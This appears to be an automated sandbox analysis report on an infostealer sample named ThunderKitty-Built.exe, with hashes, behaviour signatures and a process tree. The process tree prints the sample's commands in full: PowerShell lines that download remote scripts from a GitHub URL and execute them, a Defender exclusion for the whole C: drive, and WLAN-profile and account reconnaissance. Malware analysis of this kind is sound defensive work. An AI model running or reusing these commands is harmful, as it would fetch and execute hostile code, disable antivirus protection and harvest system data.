Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10/07/2024, 19:20
Static task
static1
Behavioral task
behavioral1
Sample
ThunderKitty-Built.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ThunderKitty-Built.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
ThunderKitty-Built.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
ThunderKitty-Built.exe
Resource
win11-20240709-en
General
-
Target
ThunderKitty-Built.exe
-
Size
9.1MB
-
MD5
11465eca8be1b364fbbda360d437c855
-
SHA1
25c42bfe635ccf389e2de5e5c194ee6f3794d325
-
SHA256
7d02de7a3e4f7b6d01b58057b4488beecf4e8123f6d24bf0156138e4bc31594a
-
SHA512
5838c8f3638713b1718e821c717817e08392766348ad5adc407c62ecb03a11b3c83162b43f377a26d4cb03409523410029e4e91cbb6ab94c26e806bf14de595d
-
SSDEEP
98304:ViWVwpItpo8Bv/3mSsaixt1qUkFpq9EGyakRUG:SpItpBvqZWpjP4G
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 4188 powershell.exe 6 3352 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2796 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4084 netsh.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 6 raw.githubusercontent.com 4 raw.githubusercontent.com 5 raw.githubusercontent.com -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
pid Process 2000 ipconfig.exe 4028 NETSTAT.EXE 3712 ipconfig.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2796 powershell.exe 4188 powershell.exe 3352 powershell.exe 2796 powershell.exe 4188 powershell.exe 3352 powershell.exe 3352 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 4188 powershell.exe Token: SeDebugPrivilege 3352 powershell.exe Token: SeIncreaseQuotaPrivilege 3352 powershell.exe Token: SeSecurityPrivilege 3352 powershell.exe Token: SeTakeOwnershipPrivilege 3352 powershell.exe Token: SeLoadDriverPrivilege 3352 powershell.exe Token: SeSystemProfilePrivilege 3352 powershell.exe Token: SeSystemtimePrivilege 3352 powershell.exe Token: SeProfSingleProcessPrivilege 3352 powershell.exe Token: SeIncBasePriorityPrivilege 3352 powershell.exe Token: SeCreatePagefilePrivilege 3352 powershell.exe Token: SeBackupPrivilege 3352 powershell.exe Token: SeRestorePrivilege 3352 powershell.exe Token: SeShutdownPrivilege 3352 powershell.exe Token: SeDebugPrivilege 3352 powershell.exe Token: SeSystemEnvironmentPrivilege 3352 powershell.exe Token: SeRemoteShutdownPrivilege 3352 powershell.exe Token: SeUndockPrivilege 3352 powershell.exe Token: SeManageVolumePrivilege 3352 powershell.exe Token: 33 3352 powershell.exe Token: 34 3352 powershell.exe Token: 35 3352 powershell.exe Token: 36 3352 powershell.exe Token: SeIncreaseQuotaPrivilege 3352 powershell.exe Token: SeSecurityPrivilege 3352 powershell.exe Token: SeTakeOwnershipPrivilege 3352 powershell.exe Token: SeLoadDriverPrivilege 3352 powershell.exe Token: SeSystemProfilePrivilege 3352 powershell.exe Token: SeSystemtimePrivilege 3352 powershell.exe Token: SeProfSingleProcessPrivilege 3352 powershell.exe Token: SeIncBasePriorityPrivilege 3352 powershell.exe Token: SeCreatePagefilePrivilege 3352 powershell.exe Token: SeBackupPrivilege 3352 powershell.exe Token: SeRestorePrivilege 3352 powershell.exe Token: SeShutdownPrivilege 3352 powershell.exe Token: SeDebugPrivilege 3352 powershell.exe Token: SeSystemEnvironmentPrivilege 3352 powershell.exe Token: SeRemoteShutdownPrivilege 3352 powershell.exe Token: SeUndockPrivilege 3352 powershell.exe Token: SeManageVolumePrivilege 3352 powershell.exe Token: 33 3352 powershell.exe Token: 34 3352 powershell.exe Token: 35 3352 powershell.exe Token: 36 3352 powershell.exe Token: SeIncreaseQuotaPrivilege 3352 powershell.exe Token: SeSecurityPrivilege 3352 powershell.exe Token: SeTakeOwnershipPrivilege 3352 powershell.exe Token: SeLoadDriverPrivilege 3352 powershell.exe Token: SeSystemProfilePrivilege 3352 powershell.exe Token: SeSystemtimePrivilege 3352 powershell.exe Token: SeProfSingleProcessPrivilege 3352 powershell.exe Token: SeIncBasePriorityPrivilege 3352 powershell.exe Token: SeCreatePagefilePrivilege 3352 powershell.exe Token: SeBackupPrivilege 3352 powershell.exe Token: SeRestorePrivilege 3352 powershell.exe Token: SeShutdownPrivilege 3352 powershell.exe Token: SeDebugPrivilege 3352 powershell.exe Token: SeSystemEnvironmentPrivilege 3352 powershell.exe Token: SeRemoteShutdownPrivilege 3352 powershell.exe Token: SeUndockPrivilege 3352 powershell.exe Token: SeManageVolumePrivilege 3352 powershell.exe Token: 33 3352 powershell.exe Token: 34 3352 powershell.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 4472 wrote to memory of 3352 4472 ThunderKitty-Built.exe 84 PID 4472 wrote to memory of 3352 4472 ThunderKitty-Built.exe 84 PID 4472 wrote to memory of 2796 4472 ThunderKitty-Built.exe 85 PID 4472 wrote to memory of 2796 4472 ThunderKitty-Built.exe 85 PID 4472 wrote to memory of 4188 4472 ThunderKitty-Built.exe 86 PID 4472 wrote to memory of 4188 4472 ThunderKitty-Built.exe 86 PID 3352 wrote to memory of 856 3352 powershell.exe 93 PID 3352 wrote to memory of 856 3352 powershell.exe 93 PID 856 wrote to memory of 4100 856 csc.exe 94 PID 856 wrote to memory of 4100 856 csc.exe 94 PID 3352 wrote to memory of 512 3352 powershell.exe 95 PID 3352 wrote to memory of 512 3352 powershell.exe 95 PID 3352 wrote to memory of 2956 3352 powershell.exe 97 PID 3352 wrote to memory of 2956 3352 powershell.exe 97 PID 2956 wrote to memory of 4968 2956 net.exe 98 PID 2956 wrote to memory of 4968 2956 net.exe 98 PID 3352 wrote to memory of 4084 3352 powershell.exe 99 PID 3352 wrote to memory of 4084 3352 powershell.exe 99 PID 3352 wrote to memory of 2780 3352 powershell.exe 100 PID 3352 wrote to memory of 2780 3352 powershell.exe 100 PID 3352 wrote to memory of 4588 3352 powershell.exe 101 PID 3352 wrote to memory of 4588 3352 powershell.exe 101 PID 4588 wrote to memory of 4732 4588 net.exe 102 PID 4588 wrote to memory of 4732 4588 net.exe 102 PID 3352 wrote to memory of 2000 3352 powershell.exe 103 PID 3352 wrote to memory of 2000 3352 powershell.exe 103 PID 3352 wrote to memory of 3988 3352 powershell.exe 104 PID 3352 wrote to memory of 3988 3352 powershell.exe 104 PID 3988 wrote to memory of 4300 3988 net.exe 105 PID 3988 wrote to memory of 4300 3988 net.exe 105 PID 3352 wrote to memory of 968 3352 powershell.exe 106 PID 3352 wrote to memory of 968 3352 powershell.exe 106 PID 3352 wrote to memory of 4028 3352 powershell.exe 107 PID 3352 wrote to memory of 4028 3352 powershell.exe 107 PID 3352 wrote to memory of 4336 3352 powershell.exe 108 PID 3352 wrote to memory of 4336 3352 powershell.exe 108 PID 3352 wrote to memory of 3712 3352 powershell.exe 109 PID 3352 wrote to memory of 3712 3352 powershell.exe 109 PID 3352 wrote to memory of 3436 3352 powershell.exe 110 PID 3352 wrote to memory of 3436 3352 powershell.exe 110 PID 3352 wrote to memory of 1220 3352 powershell.exe 111 PID 3352 wrote to memory of 1220 3352 powershell.exe 111 PID 3352 wrote to memory of 5068 3352 powershell.exe 112 PID 3352 wrote to memory of 5068 3352 powershell.exe 112
Processes
-
C:\Users\Admin\AppData\Local\Temp\ThunderKitty-Built.exe"C:\Users\Admin\AppData\Local\Temp\ThunderKitty-Built.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vijpfebr\vijpfebr.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD0AE.tmp" "c:\Users\Admin\AppData\Local\Temp\vijpfebr\CSCB88E8B7E5B6481E84EFB5D54B5BEB4A.TMP"4⤵PID:4100
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
PID:512
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators4⤵PID:4968
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall show allprofiles3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4084
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /all3⤵PID:2780
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" user3⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user4⤵PID:4732
-
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /displaydns3⤵
- Gathers network information
PID:2000
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup3⤵
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup4⤵PID:4300
-
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" startup get command caption3⤵PID:968
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano3⤵
- Gathers network information
PID:4028
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe3⤵PID:4336
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all3⤵
- Gathers network information
PID:3712
-
-
C:\Windows\system32\ROUTE.EXE"C:\Windows\system32\ROUTE.EXE" print3⤵PID:3436
-
-
C:\Windows\system32\ARP.EXE"C:\Windows\system32\ARP.EXE" -a3⤵PID:1220
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5068
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -C "Add-MpPreference -ExclusionPath 'C:'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5f54739f39b26bcb477df3cc1d938c8de
SHA1ce32f9dd56d756b9026ac33fe104b975118cb70f
SHA2568ad9052ea2d364855cbf3731f4b5267c633205d2903289e18a21787b57b51312
SHA51235e61cc96c228346a2b586970a55f8b686c7fe99eef86bcc63f00ccd38318a750bc6dd79d56d9daa79746ac67fc6153d57c1b4feb8c002fefe8dbd5a0fe57968
-
Filesize
1KB
MD5fe556934f6b14e7f45b76a64dca05876
SHA14423bddb5a533251e86716a95e1a6e3029d7d362
SHA2563f6175dafa5968202fd6e28f97b8020c99abddf2c92705ae1e85eef9c972502c
SHA5120bdb67684166517abaf3b7de1a3282d6f702330665e807b1ccc5ad410f1a48ffdc0c837145ced787f53194850ce08f4982b4ded300606b7f9a546f3f3eb387be
-
Filesize
1KB
MD588bcb80cc060706af18232c5bd63a8cb
SHA1a265e6298e3e85cf5e25e29d84ac30b593a1854b
SHA2565a35b8ddb8d68527e23b8697b882d63028e094c3ae8701fa7cd883cc093900ca
SHA5127e1a2c48817276493725b99aaa41433ed38dab9aaaea4b173ae6964c65928dad0ec1aed2d2e2ca7af21552b364cb7b4800c98f72c398e16966892a1c5fdbff32
-
Filesize
21KB
MD58e2ea6d3c59f272c517a63f408f2e1d3
SHA15cd31b57f7148e8ce1792d19f402051648aac468
SHA2560d3d0eb12407d8317cbe47f12da60acd363e3d35699250e5cd80d93b706a6d12
SHA512194b816afa8ad68ebb943a08d4eb66c3b41f4bfba155d8a3d32fe4eead1d32aad1c86bd6288011e87e605b8702ca8470b805233e09a311a33f99a4324473c936
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5e704008d525d9396fed9a8d7825f0dd4
SHA1a1c7af567a21fc8dea766edc9c6ef48dc41cf67c
SHA256d57048d9ba8c3dd4cd883aae4eef1cfca1b0682adc558c5616273c7b31118151
SHA512f10d1f2d9f9dffe37a94b7be510025533258a5b90173d32bb834f67b98139cf4d9ae2ecf3b4c98907bcf1745b80064e5ab410724b69103d0582c55558a6d5de0
-
Filesize
652B
MD5bca3736567b5f763da8b79087ec9f8dc
SHA11e21a8ac485341470c3b9a6d2dadfa1a5c8e267e
SHA25664883b614241d5c30173a5009550c8b82a57b118b5ed5e707311658184aaad75
SHA512ecee1e957d163b12023039e331ea03faf1b780838bd7bc4f0dd4b7d74dec44572e67431378c7fb1492ade3c7613389c01851fc1ca9c26d5c376319f7ec7d9d6f
-
Filesize
1KB
MD58a1e7edb2117ec5dde9a07016905923b
SHA10155dbeeb16333e2eaa767b0209750efee56f47f
SHA256c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007
SHA5124ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21
-
Filesize
369B
MD59aa828a32351da791b88d3eb1109f4f2
SHA150adca7939beb30fc45c9355a3d44daf190225d3
SHA2560df4d71b8ed36bef75e8a9f5a1887b478dd2269281627a84278c9915c7853cb8
SHA512f94e07b3fc16649895fbd042265e0bb19f04ecd2ed18a3af635d58102db02d071bca2244683f07e971ca90e838cf4ec729dac6837cb4b06761baf13fd83cef4a